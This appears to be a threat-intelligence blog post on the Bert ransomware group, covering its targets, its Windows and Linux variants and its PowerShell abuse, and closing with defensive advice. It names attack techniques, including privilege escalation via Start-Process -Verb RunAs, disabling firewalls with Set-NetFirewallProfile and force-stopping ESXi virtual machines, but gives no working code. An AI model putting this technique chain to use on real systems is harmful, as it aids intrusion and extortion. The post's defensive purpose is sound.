Bert Ransomware Group Unleashed: How a New Cyber Threat Is Evolving and Striking Organizations Worldwide

Cybersecurity is in a constant state of flux, with new threats emerging as quickly as old ones are addressed. But every so often, a group appears that truly disrupts the status quo—one that adapts, innovates, and spreads faster than most defenders can keep up. The recently discovered Bert ransomware group is rapidly proving to be one of those game-changers.

If you work in IT, manage security for your organization, or simply want to stay ahead of cybercriminals, understanding Bert’s methods and their implications is more than a technical curiosity—it’s a necessity. Let’s break down what makes Bert different, why their attacks matter, and what you can do to stay protected as ransomware evolves in real time.

Who Is the Bert Ransomware Group? A New Player on the Global Stage

In April 2025, cybersecurity analysts at Trend Micro began tracking a previously unknown ransomware group. Dubbed “Bert” (also tracked as “Water Pombero”), this group wasted no time making its presence felt.

What Sets Bert Apart?

Targets: Bert has attacked organizations across the US, Asia, and Europe.
Sectors hit: Healthcare, technology, and event services have all reported confirmed incidents.
Dual-platform focus: Unlike many early-stage groups, Bert has released ransomware variants for both Windows and Linux environments.
Rapid evolution: In just a few months, their code, techniques, and obfuscation methods have improved remarkably, showing a level of sophistication rarely seen in newcomers.

Here’s why that matters: Most ransomware groups take years to refine their approach, but Bert is iterating at lightning speed, leaving defenders scrambling.

Tracing Bert’s Footprints: Infrastructure and Attribution

One of the first clues to Bert’s operations came from where the attacks originated. The group’s ransomware is downloaded and executed from a remote IP address associated with ASN 39134, a network registered in Russia.

Now, does this mean Bert is a Russian outfit? Not necessarily—cybercriminals often route attacks through foreign infrastructure to muddy the waters. But it’s a key detail, hinting at possible connections to threat actors operating in, or affiliated with, the region.

“While this alone does not establish attribution, the use of Russian infrastructure may indicate a potential connection to threat actors operating in or associated with the region,” – Trend Micro researchers

Bert’s Attack Chain: How Does the Ransomware Infect Victims?

If you’re wondering how Bert gets in, you’re not alone. As of now, the exact initial access vector remains unknown. But there are some clues:

Post-compromise activity is well-documented, including the use of PowerShell scripts for privilege escalation and disabling firewalls.
Ransomware payloads are delivered remotely and executed with elevated privileges.
Adaptation to environment: Bert variants intelligently tailor their approach depending on whether they’re targeting Windows or Linux systems.

Let me explain why that’s important: Even without knowing precisely how Bert breaks into networks, their ability to quickly move laterally, escalate privileges, and deploy ransomware shows a high degree of operational maturity.

Bert’s Ransomware Variants: Fast Evolution, Greater Danger

What’s truly alarming about Bert is the speed and sophistication of their code evolution—especially across both Windows and Linux ecosystems. Let’s take a closer look.

Older Windows Variants: Simple but Effective

Initially, Bert’s Windows ransomware used a straightforward approach:

Drive enumeration: It mapped out all available drives.
Note-dropping: Placed ransom notes in every directory.
File path collection: Gathered a list of valid files to encrypt.
Multi-threaded encryption: Processed files in parallel—after the initial collection.

While this approach worked, it gave defenders a small window of time to detect and halt the process before full encryption occurred.

Newer Windows Variants: Faster, Smarter, More Dangerous

Recent analysis uncovered significant improvements:

ConcurrentQueue data structure: Allows immediate queuing and processing of files as they’re discovered, rather than waiting for a full directory scan.
DiskWorker component: Enables concurrent, multi-disk processing.
Encryption begins instantly: As soon as a file is identified, encryption starts, drastically reducing detection and response time.
Standard AES encryption: Reliable and tough to crack without the decryption key.

Bottom line: Bert’s new variants leave defenders with even less time to react. The group is learning from early efforts and optimizing for speed and efficiency.

Bert’s Linux Ransomware: Targeting Servers with Ruthless Efficiency

Bert isn’t content to target just Windows environments. In May, Trend Micro researchers discovered a Linux variant that’s no less concerning:

50+ threads for encryption: Ensures rapid encryption across large file systems.
Disables ESXi virtual machines: By force-terminating all running VMs, Bert ensures that critical infrastructure is vulnerable.
File extension: Encrypted files are marked with .encrypted_by_bert.
Ransom note: Dropped as encrypted_by_bert-decrypt.txt.

A particularly modern touch? The JSON-formatted configuration embedded in the binary. This allows for quick customization and adaptation across campaigns—mirroring techniques used by infamous groups like REvil (which Bert’s Linux variant may be derived from).

PowerShell Abuse: The Swiss Army Knife of Bert’s Operations

One of Bert’s defining features is their clever abuse of legitimate administration tools, especially Microsoft PowerShell.

How Does Bert Use PowerShell?

Privilege escalation: Using commands like Start-Process with the -Verb RunAs flag, Bert elevates their access to full administrator rights.
Defense evasion: PowerShell is used to disable Windows firewall profiles (Set-NetFirewallProfile)—making it easier for the ransomware to operate undisturbed.
Loading the ransomware: Scripts like start.ps1 are leveraged to execute the malicious payload and ensure persistence.

Why is this so effective? PowerShell is a trusted, built-in Windows tool. Its use often flies under the radar, especially in organizations without strict script monitoring in place.

Real-World Example: From Compromise to Control

Imagine an attacker already has a foothold on your network—perhaps via a phishing email or exploited vulnerability. With one PowerShell command, they:

Elevate their privileges
Turn off your firewalls
Download and execute ransomware from a remote server

All before most security tools can raise the alarm.

What Makes Bert Dangerous? Key Takeaways for Security Leaders

So, what separates Bert from other ransomware groups—and why should you care?

1. Speed and Agility

Bert’s code is iterating rapidly, with new versions appearing within weeks, not months.
Encryption processes are streamlined, minimizing detection and response time.

2. Cross-Platform Targeting

Both Windows and Linux environments are in the crosshairs.
Linux variant specifically attacks ESXi hosts, expanding the range of potential victims.

3. Living Off the Land

Bert leverages legitimate tools (like PowerShell) for malicious purposes, making detection trickier.

4. Infrastructure Hints at Experienced Actors

Use of Russian-registered infrastructure could mean collaboration or code-sharing with seasoned threat groups.

5. Sector Diversity

Victims span healthcare, technology, and events—indicating opportunism and broad reach.

Here’s why that’s a wakeup call: Even if your organization isn’t a typical “high-value” ransomware target, Bert’s scattershot approach means no one is safe.

Lessons from Bert: How Ransomware Is Changing in 2025

The emergence of Bert is part of a larger trend in ransomware:

Repurposing existing tools and code: New attackers don’t need to reinvent the wheel—just tweak, iterate, and deploy.
Continuous refinement: Attackers monitor what works and rapidly adjust tactics, techniques, and procedures (TTPs).
Focus on fast monetization: Every improvement Bert has made is aimed at minimizing their window of exposure and maximizing their leverage over victims.

If you’re feeling overwhelmed, you’re not alone. The playbook is being rewritten in real time.

Defense Strategies: Protecting Your Organization from Bert and Its Peers

Now for the part you’re probably most interested in: How can you defend against Bert and other rapidly evolving ransomware groups?

1. Monitor PowerShell and Script Execution

Audit and restrict PowerShell use: Use whitelisting and monitoring tools to detect unusual script activity, especially scripts that escalate privileges or disable defenses.
Alert on suspicious commands: Look for flags like -Verb RunAs or references to firewall profiles.

2. Harden Endpoint Defenses

Keep systems up to date: Patch vulnerabilities that could be used for initial access.
Employ endpoint detection and response (EDR) tools capable of catching both known and unknown threats.

3. Regular Backups and Recovery Drills

Test your backups: Frequently test restoration from backups to ensure you can recover quickly if ransomware hits.
Store backups offline: Protect them from being encrypted alongside production data.

4. Network Segmentation and Least Privilege

Limit lateral movement: Segment your network to prevent attackers from easily spreading ransomware.
Restrict admin privileges: Only give elevated permissions to those who genuinely need them.

5. Employee Awareness and Training

Phishing defenses: Since the initial access method for Bert is unknown, train staff to recognize social engineering attempts.
Report suspicious activity: Foster a culture where employees feel comfortable flagging odd behavior.

6. Collaborate and Stay Informed

Share intelligence: Participate in industry ISACs and threat intelligence sharing organizations.
Follow trusted sources: Keep up with updates from cybersecurity leaders like Trend Micro, CISA, and Europol.

The Human Side: Why Bert’s Rise Should Concern Every Organization

It’s easy to think of ransomware as a distant threat—something that happens to other people, somewhere else. But Bert’s attacks against healthcare providers, tech firms, and event service companies prove otherwise.

Here’s why that matters: Ransomware isn’t just about lost files or IT headaches. It’s about patients unable to access care, businesses forced offline, and reputations harmed overnight.

If you’re in charge of keeping your organization safe, Bert’s emergence is a stark reminder that:

No sector is immune
No system is too obscure
No business is too small or big to be targeted

FAQs: People Also Ask About Bert Ransomware

What is the Bert ransomware group?

The Bert ransomware group is a newly discovered cybercriminal operation active since April 2025. They target organizations worldwide, leveraging rapidly evolving ransomware variants for both Windows and Linux systems. Their attacks have hit sectors like healthcare, technology, and events.

How does Bert ransomware infect victims?

The precise initial access method is still undetermined, but Bert is known to use PowerShell scripts to escalate privileges, disable defenses, and deliver ransomware payloads. Their tactics are adaptive, making use of both legitimate and malicious tools.

What makes Bert ransomware particularly dangerous?

Bert stands out due to its fast code evolution, multi-platform targeting, abuse of trusted administration tools, and rapid encryption methods that leave little time for defenders to respond.

Is there a connection between Bert and Russian cybercriminals?

While Bert’s ransomware is downloaded from IP addresses registered in Russia (ASN 39134), this doesn’t conclusively prove Russian involvement. It’s a common technique for attackers to obfuscate their origins.

Can Linux systems be affected by Bert ransomware?

Yes. Bert has developed a Linux ransomware variant that specifically targets servers, including those running ESXi virtual machines, using multi-threaded encryption for maximum impact.

How can organizations protect themselves from Bert and similar threats?

Key steps include monitoring PowerShell and script execution, hardening endpoints, maintaining secure and tested backups, enforcing network segmentation, restricting privileges, and ongoing employee training.

Where can I find more information on Bert ransomware?

Authoritative sources include Trend Micro’s security reports, CISA ransomware guidance, and ongoing updates from cybersecurity news outlets like The Hacker News.

Final Thoughts: Staying One Step Ahead in the Ransomware Arms Race

The Bert ransomware group is a wakeup call for every organization, regardless of size or sector. Their rapid evolution, cross-platform focus, and adept use of everyday tools like PowerShell underscore a new era for cyber threats—one where simplicity, speed, and adaptability trump complexity.

The best defense? Stay informed, stay vigilant, and invest in layered security practices that make it as hard as possible for attackers to succeed.

If you found this analysis useful, consider subscribing for more insights, practical guidance, and the latest threat intelligence. Together, we can turn knowledge into action—and keep one step ahead of the next big threat.

Discover more at InnoVirtuoso.com

I would love some feedback on my writing so if you have any, please don’t hesitate to leave a comment around here or in any platforms that is convenient for you.

For more on tech and other topics, explore InnoVirtuoso.com anytime. Subscribe to my newsletter and join our growing community—we’ll create something magical together. I promise, it’ll never be boring!

Stay updated with the latest news—subscribe to our newsletter today!

Thank you all—wishing you an amazing day ahead!